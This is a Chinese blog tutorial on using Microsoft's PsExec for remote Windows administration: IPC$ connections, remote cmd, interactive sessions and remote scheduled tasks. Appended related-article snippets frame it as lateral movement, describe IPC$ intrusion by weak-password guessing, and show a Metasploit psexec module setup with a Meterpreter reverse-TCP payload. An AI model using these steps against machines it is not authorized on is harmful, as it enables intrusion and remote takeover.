Windows 远程控制之 PsExec

已于 2024-01-16 15:36:39 修改
阅读量3.2k 收藏 12
点赞数 10
分类专栏: Windows 文章标签: windows
于 2024-01-12 14:09:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mshxuyi/article/details/135551081
版权
本文介绍了PsExec这款工具,如何在Windows系统间进行远程命令执行、建立IPC$连接、执行带UI界面的程序,以及通过计划任务实现定时操作,详细解释了其安装、配置和使用方法。
摘要由CSDN通过智能技术生成
一、介绍:

PsExec 是一种轻量级 telnet 替代品,可让你在其他系统上执行进程,并为控制台应用程序提供完整交互性,而无需手动安装客户端软件。 PsExec 最强大的用途包括在远程系统上启动交互式命令提示符,以及 IpConfig,CMD等远程启用工具,否则无法显示有关远程系统的信息。

服务器:Windows 2012 R2  IP:10.3.0.233

客户端:Windows 10

二、安装

官方下载地址:PsExec - Sysinternals | Microsoft Learn

客户端安装:本例是下载C盘

配置环境变量 

三、使用前提条件

1、服务器必须开启 IPC$,ADMIN$,默认安装时都是打开的

PS C:\Users\Administrator> net share

共享名       资源                            注解

-------------------------------------------------------------------------------
C$           C:\                             默认共享
IPC$                                         远程 IPC
ADMIN$       C:\Windows                      远程管理
命令成功完成。

2、防火墙 445 端口要放行,文件和打印机共享(SMB-In)

 

四、用法 

PsExec 相关参数说明

-accepteula:第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框
-u:用户名
-p:密码
-d:指的是执行完命令不等待程序执行完成,命令行恢复到可输入状态。
-s:以system权限运行运程进程,获得一个system权限的交互式shell。如果不使用该参数,会获得一个连接所用用户权限的shell
-i: 运行该程序,以便它与远程系统上指定会话的桌面进行交互。如果没有指定会话,进程将在控制台会话中运行

1、建立 IPC$ 连接

net use \\10.3.0.233\ipc$ /user:administrator Admin@123

2、远程打开 cmd 命令

PS C:\Users\Administrator> psexec \\10.3.0.233 cmd

# 输出
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。

# 成功连接
C:\Windows\system32>

# 验证,显示的是服务器的IP地址
C:\Windows\system32>ipconfig

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::b17d:a13d:4859:66cb%12
   IPv4 地址 . . . . . . . . . . . . : 10.3.0.233
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.3.0.1

隧道适配器 isatap.{5F993BE3-92E0-4365-A0D1-9827107330FF}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

 3、如果开始没有建立 IPC$ 连接,也可以用 psexec 命令时指定用户名密码

psexec \\10.3.0.233 -u administrator -p Admin@123 -i cmd

4、如何显示远程机器UI界面

(1)远程连接上服务器 

# 远程服务器
psexec \\10.3.0.233 cmd

# 输出
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com

(2)查询服务器上面用户会话 ID,执行完退出

# 查询用户ID,这里查到的是1
C:\Windows\system32>query session

# 输出
 会话名            用户名                   ID  状态    类型        设备
>services                                    0  断开
 console           Administrator             1  运行中
 rdp-tcp


# 退出
C:\Windows\system32>exit
cmd exited on 10.3.0.233 with error code 9009.

(3)在客户端远程执行服务器带UI界面的程序

PS C:\Users\Administrator> psexec \\10.3.0.233 -u administrator -p Admin@123 -i 1 -d cmd

PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com


cmd started on 10.3.0.233 with process ID 944.

(4)服务器上面查看

5、也可以通过计划任务打开界面

# 创建任务
SCHTASKS /Create /S 10.3.0.233 /U administrator /P Admin@123 /TN calc /TR C:\windows\system32\calc.exe /SC once /ST 09:00


# 运行任务
SCHTASKS /Run /S 10.3.0.233 /U administrator /P Admin@123 /TN calc

Tom Ma.
关注
专栏目录
如何使用PSTools工具集中的PSExec修改注册表信息,解决某些注册表项无法删除的问题
penriver的博客
10-08 214
如何使用PSTools工具集中的PSExec修改注册表信息,解决某些注册表项无法删除的问题
Windows远程执行
最新发布
yyh_linux_note的博客
04-08 1371
本文分享的一些远程执行示例,目的是为了提高用户的安全防范意识以及从安全的角度去考虑如何监控或阻止一些人的恶意手段,大家一定要用在正确的用途上
一个功能强大的NT2K远程管理工具包
weixin_34336292的博客
02-17 250
当网管维护的技术人员,经常要在命令提示符下输入各种命令调试系统,但如果你需要调用其他的机子的命令提示符时候,只能用telnet和远程控制软件,在这两种软件都没有的情况下,还有没有其他的方法呢?有,不但方便,功能也十分强大。它就是sysinternals出的一个功能强大的nt/2k远程管理工具包pstools.它的主页为[url]http://www.sysinternals....
横向渗透之PsExec工具使用
qq_46258964的博客
04-16 3933
psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限 PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程, 并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。 PsExec的基本原理是: 通过管道在远程目标机器上创建一个psexec服务, 并在本地磁盘中生成一个名为PSEXESVC的二进制文件, 然后通过psexec服务运行命令,运行结束后删除任务。 利用条件 445端口开放, 知道目标账号密码 PsExec下载地址 优点:可以躲避检测无视杀毒软件
Windows远程执行进程工具psexec和wmiexec介绍
测试开发小记
05-08 4055
在自动化测试或者自动化工具开发中,通常需要向其它电脑或者服务器发送指令,比如Windows发送命令到Linux服务器开启某个服务进程,或者读取状态信息,我们可以使用ssh协议实现。如果Windows主机需要发送命令到局域网内的其它Windows电脑要如何实现呢?在网络安全中称为横向移动的内网渗透方法可实现远程执行命令,横向移动工具有很多,本文介绍psexec和wmiexec这两个工具如何实现远程执行进程。
使用Psexec.exe 命令行远程windows执行命令
聆听风雨的博客
04-10 4601
背景: 博主今天遇到个问题,就是通过远程桌面远程公司电脑的时候一直卡在请稍等页面无法操作。这种问题一般重启即可解决,但由于周末公司也没人帮忙重启。所以想到有没有可以像linux那样命令行的方式远程到windows。结果一搜,还真有。 1、下载psexec PsExec - Windows Sysinternals | Microsoft Docs 2、命令行链接 PsExec.exe \\192.168.1.1 -u administrator -p password -i -c cmd.exe
psexec远程安装软件
12-13
PsExec的用法如下:      1)psexec   usage: psexec \computer [-u username [-p password] [-c [-f] [-i][-d] program [arguments]      psexec是一个远程执行工具,你可以像使用telnet一样使用它。   它的使用格式为:   psexec \远程机器ip [-u username [-p password] [-c [-f] [-i][-d] program [arguments]   它的参数有:   -u后面跟用户名 -p后面是跟密码的,如果建立ipc连接后这两个参数则不需要。(如果没有-p参数,则输入命令后会要求你输入密码)   -c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)   -d不等待程序执行完就返回,(比如要让远程机器运行tftp服务端的时候使用,不然psexec命令会一直等待tftp程序结束才会返回) -i 在远程机器上运行一个名为psexesvc进程,(到底什么用弄不明白) @file 用于针对文本文件中所指定的所有计算机运行该命令(下同)      假设我在远程机器ip有一个账号,账号名是:abc 密码是:123   比如想要用telnet一样在远程系统上执行命令可以打:   psexec \远程机器ip -u abc -p 123 cmd      如果想要远程机器执行本地c:srm.exe文件可以打:   psexec \远程机器ip -u abc -p 123 -c c:srm.exe      如果想要让远程机器执行本地上tftp服务端,(假设tftp服务端在本地c:tftp32.exe),可以打:   psexec \远程机器ip -u abc -p 123 -c c:tftp32.exe -d
远程执行命令psexec工具的基本使用——简单、强大
Miss_Easy的专栏
08-19 2万+
关于psexec工具的基本使用——简单、强大 当你工作中需要执行远程命令时,就用到了psexecpsexec使用简单,但是功能却是很强大。下面就来介绍psexec的基本使用方法。 首先下载psexec [ psexec官方下载地址 ] psexec下载完成后,将psexec压缩包解压到你指定的一个路径,比如我将psexec的压缩包解压到d:\psexec 。 然后,我们
如何使用 PsExec 执行远程命令
Finder_Way
12-24 5591
前言 这紧紧只是一篇纯技术分享。我们的程序在运行时需要连接多台目标机器,并拷贝目标机器上特定文件夹中的文件。为了方便访问,要在每台目标机器上建立一个特定用户,所以 PsExec 成了实现此功能的一个方案(虽然已经被弃用)。 PsExec 简介 PsExec工具包含在远程管理工具包 PsTools 中,可以从该地址获取。 开启 Admin$ 使用PsExec执行远程命令,需要开启 Admi...
windows远程控制基本命令
01-21
本文将详细介绍一些常用的Windows远程控制命令。 1. **mstsc (Microsoft Terminal Services Client)** - `mstsc` 是Windows内置的远程桌面连接工具的命令行版本。通过输入 `mstsc` 后跟目标计算机的IP地址或主机名...
横向移动检测之远程执行(一)PsExec
qq_27828281的博客
09-18 4765
横向移动——PsExec远程执行分析及溯源
Psexec远程CMD工具
12-31
psexec是一个远程执行工具,你可以像使用telnet一样使用它。
Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)
LKmnbZ's Blog
01-14 7065
一、经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令来得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32...
Windows 远程停止iis服务 jenkins psexec
dz45693的专栏
12-31 1万+
最近遇到一个小需求,需要重启远程计算机的iis服务。 需求背景是这样的,用jenkins 做ci的时候, 由于项目是有单独的web服务器,项目虽然是一套, 但是分为A,B,C三个web系统,其中A,B系统要部署很多套,以便C使用。实现的思路就是 1.jenkin 从svn里面拉取code 2.jenkins编译并 在jenkins 服务器输出A,B,C 3.用 CIFS Publishers
windows远程命令执行
热门推荐
Shanfenglan's blog
08-26 26万+
以下所有实验均在工作组环境下 psexec psexec.exe \ip –accepteula -u username -p password program.exe psexec.exe \host -accepteula -u domain\username -p password -d -c 获取对方主机的账号密码后且对方开启445端口,可以使用psexec来进行远程命令执行。 psexec \172.16.99.233 -u administrator -p 123 -c cmd.exe .
使用PSexec进行远程桌面操控(模拟apt攻击的Lateral Movement)
m0_52286166的博客
10-10 830
一、实验目的: 用虚拟机模拟两台机器,在控制的主机上,使用psexec工具,打开另一台Windows主机的远程桌面服务,用远程桌面连接目标Windows主机,得到控制权。 原始实验要求: 二、实验过程: 第一步: 创建虚拟机,配置网络环境。 可参考:安装虚拟机:VMware安装win10镜像_嗨伟的博客-CSDN博客_vmware win10镜像 使用NAT模式配置网络: VMware window虚拟机 NAT 模式下配置图文教程_du2lang0的博客-CSDN博客 第二.
PsExec连接远程机器的cmd
andylauhuang2012的专栏
02-26 3348
实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。PsExec 最强大的功能之一是在远程系统和远程支持
Windows远程执行命令
小晓晓晓林的博客
01-21 1万+
环境:Win10、Win7虚拟机 Windows远程命令执行 1、psexec.exe远程执行命令 psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe 这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Admin...
msf的exploit/windows/smb/psexec模块使用
05-23
msf的exploit/windows/smb/psexec模块是一种基于SMB协议的远程执行漏洞利用模块,可以用于尝试利用目标机器上的Windows系统漏洞,并在远程执行的过程中获得对目标机器的控制权限。使用该模块需要先设置相关参数,包括目标机器的IP地址、用户名、密码、要执行的命令等等,然后使用run命令启动攻击。 下面是一个使用msf的exploit/windows/smb/psexec模块的示例: 1. 设置目标机器IP地址、用户名、密码等参数: ``` set RHOST 192.168.1.100 set SMBUser Administrator set SMBPass Password123 ``` 2. 设置要执行的命令: ``` set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.101 set ExitOnSession false ``` 3. 启动攻击: ``` run ``` 这样就会尝试利用目标机器上的Windows系统漏洞,并在远程执行的过程中获得对目标机器的控制权限。在成功执行攻击之后,可以使用Meterpreter控制台进行后续操作,比如查看目标机器的文件、进程等信息,或者执行其他的攻击操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值